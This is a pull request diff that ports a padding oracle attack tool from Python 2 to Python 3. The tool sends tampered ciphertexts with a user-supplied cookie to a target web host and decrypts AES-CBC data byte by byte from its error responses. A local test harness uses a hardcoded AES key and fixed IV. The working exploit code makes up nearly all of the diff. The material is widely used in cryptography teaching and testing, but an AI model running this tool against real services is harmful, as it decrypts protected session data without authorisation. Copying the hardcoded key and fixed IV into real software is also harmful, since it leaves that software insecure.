Merge pull request #1 from towynlin/updates-for-python37-compatibility

Updates for python37 compatibility

Author: towynlin

exploit.py

@@ -8,13 +8,12 @@
 '''
 
 import argparse
-import httplib, urllib
+import http.client
 import re
-import binascii
 import sys
 import time
-from binascii import unhexlify, hexlify
-from itertools import cycle, izip
+from itertools import cycle
+from urllib.parse import urlencode
 
 ####################################
 # CUSTOM YOUR RESPONSE ORACLE HERE #
@@ -31,7 +30,7 @@ def test_validity(response,error):
 
     # oracle repsonse with data in the DOM
     data = response.read()
-    if data.find(error) == -1:
+    if data.find(error.encode()) == -1:
         return 1
     return 0
 
@@ -40,11 +39,11 @@ def test_validity(response,error):
 ################################
 def call_oracle(host,cookie,url,post,method,up_cipher):
     if post:
-        params = urllib.urlencode({post})
+        params = urlencode({post})
     else:
-        params = urllib.urlencode({})
+        params = urlencode({})
     headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain", 'Cookie': cookie}
-    conn = httplib.HTTPConnection(host)
+    conn = http.client.HTTPConnection(host)
     conn.request(method, url + up_cipher, params, headers)
     response = conn.getresponse()
     return conn, response
@@ -66,8 +65,11 @@ def block_padding(size_block, i):
         l.append(("0" if len(hex(i+1).split('0x')[1])%2 != 0 else '') + (hex(i+1).split('0x')[1]))
     return "00"*(size_block-(i+1)) + ''.join(l)
 
-def hex_xor(s1,s2):
-    return hexlify(''.join(chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(unhexlify(s1), cycle(unhexlify(s2)))))
+def hex_xor(s1, s2):
+    b = bytearray()
+    for c1, c2 in zip(bytes.fromhex(s1), cycle(bytes.fromhex(s2))):
+        b.append(c1 ^ c2)
+    return b.hex()
 
 def run(cipher,size_block,host,url,cookie,method,post,error):
     cipher       = cipher.upper()
@@ -78,14 +80,14 @@ def run(cipher,size_block,host,url,cookie,method,post,error):
     cipher_block = split_len(cipher, len_block)
 
     if len(cipher_block) == 1:
-        print "[-] Abort there is only one block"
+        print("[-] Abort there is only one block")
         sys.exit()  
     #for each cipher_block
     for block in reversed(range(1,len(cipher_block))):
         if len(cipher_block[block]) != len_block:
-            print "[-] Abort length block doesn't match the size_block"
+            print("[-] Abort length block doesn't match the size_block")
             break
-        print "[+] Search value block : ", block, "\n"
+        print("[+] Search value block : ", block, "\n")
         #for each byte of the block
         for i in range(0,size_block):
             # test each byte max 255
@@ -125,20 +127,20 @@ def run(cipher,size_block,host,url,cookie,method,post,error):
                         valide_value.insert(0,value[size_block-(i+1)])
 
                         if args.verbose == True:
-                            print ''
-                            print "[+] HTTP ", response.status, response.reason
-                            print "[+] Block M_Byte : %s"% bk
-                            print "[+] Block C_{i-1}: %s"% bp
-                            print "[+] Block Padding: %s"% bc
-                            print ''
+                            print('')
+                            print("[+] HTTP ", response.status, response.reason)
+                            print("[+] Block M_Byte : %s"% bk)
+                            print("[+] Block C_{i-1}: %s"% bp)
+                            print("[+] Block Padding: %s"% bc)
+                            print('')
 
                         bytes_found = ''.join(valide_value)
-                        if i == 0 and bytes_found.decode("hex") > hex(size_block) and block == len(cipher_block)-1:
-                            print "[-] Error decryption failed the padding is > "+str(size_block)
+                        if i == 0 and int(bytes_found, 16) > size_block and block == len(cipher_block)-1:
+                            print("[-] Error decryption failed the padding is > "+str(size_block))
                             sys.exit()
 
-                        print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found
-                        print ''
+                        print('\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found)
+                        print('')
 
                         break 
             if found == False:
@@ -147,31 +149,31 @@ def run(cipher,size_block,host,url,cookie,method,post,error):
                     value = re.findall('..',bk)
                     valide_value.insert(0,"01")
                     if args.verbose == True:
-                        print ''
-                        print '[-] No padding found, but maybe the padding is length 01 :)'
-                        print "[+] Block M_Byte : %s"% bk
-                        print "[+] Block C_{i-1}: %s"% bp
-                        print "[+] Block Padding: %s"% bc
-                        print ''
+                        print('')
+                        print('[-] No padding found, but maybe the padding is length 01 :)')
+                        print("[+] Block M_Byte : %s"% bk)
+                        print("[+] Block C_{i-1}: %s"% bp)
+                        print("[+] Block Padding: %s"% bc)
+                        print('')
                         bytes_found = ''.join(valide_value)
                 else:
-                    print "\n[-] Error decryption failed"
+                    print("\n[-] Error decryption failed")
                     result.insert(0, ''.join(valide_value))
                     hex_r = ''.join(result)
-                    print "[+] Partial Decrypted value (HEX):", hex_r.upper()
+                    print("[+] Partial Decrypted value (HEX):", hex_r.upper())
                     padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
-                    print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+                    print("[+] Partial Decrypted value (ASCII):", bytes.fromhex(hex_r[0:-(padding*2)]).decode())
                     sys.exit()
             found = False
 
         result.insert(0, ''.join(valide_value))
         valide_value = []
 
-    print ''
+    print('')
     hex_r = ''.join(result)
-    print "[+] Decrypted value (HEX):", hex_r.upper()
+    print("[+] Decrypted value (HEX):", hex_r.upper())
     padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
-    print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+    print("[+] Decrypted value (ASCII):", bytes.fromhex(hex_r[0:-(padding*2)]).decode())
 
 if __name__ == '__main__':                           
 

test.py

@@ -9,25 +9,24 @@
 
 import argparse
 import re
-import binascii
 import sys
 import time
-from binascii import unhexlify, hexlify
-from itertools import cycle, izip
-from Crypto.Cipher import AES
-from Crypto import Random
+from itertools import cycle
+from Cryptodome.Cipher import AES
 
 """
     AES-CBC
     function encrypt, decrypt, pad, unpad)
 """
 
 def pad(s):
-    return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)
+    pad_byte = 16 - len(s) % 16
+    for i in range(pad_byte):
+        s.append(pad_byte)
+    return s
 
 def unpad(s):
-    t = s.encode("hex")
-    exe = re.findall('..',t)
+    exe = re.findall('..',s.hex())
     padding = int(exe[-1], 16)
     exe = exe[::-1]
 
@@ -41,12 +40,11 @@ def unpad(s):
 
 def encrypt( msg, iv):
     raw = pad(msg)
-    key = Random.new().read( AES.block_size )
-    cipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )
+    cipher = AES.new(b'V38lKILOJmtpQMHp', AES.MODE_CBC, iv )
     return cipher.encrypt( raw ), iv
 
 def decrypt( enc, iv ):
-    decipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )
+    decipher = AES.new(b'V38lKILOJmtpQMHp', AES.MODE_CBC, iv )
     return unpad(decipher.decrypt( enc ))
 
 
@@ -59,7 +57,7 @@ def test_validity(error):
 
 
 def call_oracle(up_cipher, iv):
-    if decrypt( up_cipher, iv ) == 0:
+    if decrypt( bytes.fromhex(up_cipher), iv ) == 0:
         return 404
     return 200
 
@@ -80,8 +78,11 @@ def block_padding(size_block, i):
 def split_len(seq, length):
     return [seq[i:i+length] for i in range(0, len(seq), length)]
 
-def hex_xor(s1,s2):
-    return hexlify(''.join(chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(unhexlify(s1), cycle(unhexlify(s2)))))
+def hex_xor(s1, s2):
+    b = bytearray()
+    for c1, c2 in zip(bytes.fromhex(s1), cycle(bytes.fromhex(s2))):
+        b.append(c1 ^ c2)
+    return b.hex()
 
 def run(cipher,size_block):
     cipher       = cipher.upper()
@@ -92,15 +93,15 @@ def run(cipher,size_block):
     cipher_block = split_len(cipher, len_block)
 
     if len(cipher_block) == 1:
-        print "[-] Abort there is only one block, i can't influence the IV. Tried a longer message"
+        print("[-] Abort there is only one block, i can't influence the IV. Tried a longer message")
         sys.exit()
 
     #for each cipher_block
     for block in reversed(range(1,len(cipher_block))):
         if len(cipher_block[block]) != len_block:
-            print "[-] Abort length block doesn't match the size_block"
+            print("[-] Abort length block doesn't match the size_block")
             break
-        print "[+] Search value block : ", block, "\n"
+        print("[+] Search value block : ", block, "\n")
         #for each byte of the block
         for i in range(0,size_block):
             # test each byte max 255
@@ -118,7 +119,7 @@ def run(cipher,size_block):
                     #time.sleep(0.5)
 
                     # we call the oracle, our god
-                    error = call_oracle(up_cipher.decode('hex'),iv)
+                    error = call_oracle(up_cipher,iv)
 
                     if args.verbose == True:
                         exe = re.findall('..',cb)
@@ -138,19 +139,19 @@ def run(cipher,size_block):
                         valide_value.insert(0,value[size_block-(i+1)])
 
                         if args.verbose == True:
-                            print ''
-                            print "[+] Block M_Byte : %s"% bk
-                            print "[+] Block C_{i-1}: %s"% bp
-                            print "[+] Block Padding: %s"% bc
-                            print ''
+                            print('')
+                            print("[+] Block M_Byte : %s"% bk)
+                            print("[+] Block C_{i-1}: %s"% bp)
+                            print("[+] Block Padding: %s"% bc)
+                            print('')
 
                         bytes_found = ''.join(valide_value)
-                        if i == 0 and bytes_found.decode("hex") > hex(size_block) and block == len(cipher_block)-1:
-                            print "[-] Error decryption failed the padding is > "+str(size_block)
+                        if i == 0 and int(bytes_found, 16) > size_block and block == len(cipher_block)-1:
+                            print("[-] Error decryption failed the padding is > "+str(size_block))
                             sys.exit()
 
-                        print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found
-                        print ''
+                        print('\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found)
+                        print('')
 
                         break
             if found == False:
@@ -159,34 +160,35 @@ def run(cipher,size_block):
                     value = re.findall('..',bk)
                     valide_value.insert(0,"01")
                     if args.verbose == True:
-                        print ''
-                        print '[-] No padding found, but maybe the padding is length 01 :)'
-                        print "[+] Block M_Byte : %s"% bk
-                        print "[+] Block C_{i-1}: %s"% bp
-                        print "[+] Block Padding: %s"% bc
-                        print ''
+                        print('')
+                        print('[-] No padding found, but maybe the padding is length 01 :)')
+                        print("[+] Block M_Byte : %s"% bk)
+                        print("[+] Block C_{i-1}: %s"% bp)
+                        print("[+] Block Padding: %s"% bc)
+                        print('')
                         bytes_found = ''.join(valide_value)
                 else:
-                    print "\n[-] Error decryption failed"
+                    print("\n[-] Error decryption failed")
                     result.insert(0, ''.join(valide_value))
                     hex_r = ''.join(result)
                     if len(hex_r) > 0:
-                        print "[+] Partial Decrypted value (HEX):", hex_r.upper()
+                        print("[+] Partial Decrypted value (HEX):", hex_r.upper())
                         padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
-                        print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+                        print("[+] Partial Decrypted value (ASCII):", bytes.fromhex(hex_r[0:-(padding*2)]).decode())
                     sys.exit()
             found = False
 
         result.insert(0, ''.join(valide_value))
         valide_value = []
 
-    print ''
+    print('')
     hex_r = ''.join(result)
-    print "[+] Decrypted value (HEX):", hex_r.upper()
+    print("[+] Decrypted value (HEX):", hex_r.upper())
     padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
-    print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+    decoded = bytes.fromhex(hex_r[0:-(padding*2)]).decode()
+    print("[+] Decrypted value (ASCII):", decoded)
 
-    return hex_r[0:-(padding*2)].decode("hex")
+    return decoded
 
 if __name__ == '__main__':                           
 
@@ -195,10 +197,9 @@ def run(cipher,size_block):
     parser.add_argument('-v', "--verbose",  help='debug mode, you need a large screen', action="store_true")
     args = parser.parse_args()
 
-    print "[+] Encrypt", args.message
-    cipher, iv = encrypt(args.message, "1234567812345678")
-    cipher_intercepted = cipher.encode("hex")
-    print "[+] %s ---> %s" % (args.message,  cipher_intercepted)
+    print("[+] Encrypt", args.message)
+    cipher, iv = encrypt(bytearray(args.message, 'UTF-8'), b"1234567812345678")
+    print("[+] %s ---> %s" % (args.message,  cipher.hex()))
     plaintext = decrypt(cipher, iv)
 
-    run(cipher_intercepted,16)
+    run(cipher.hex(), 16)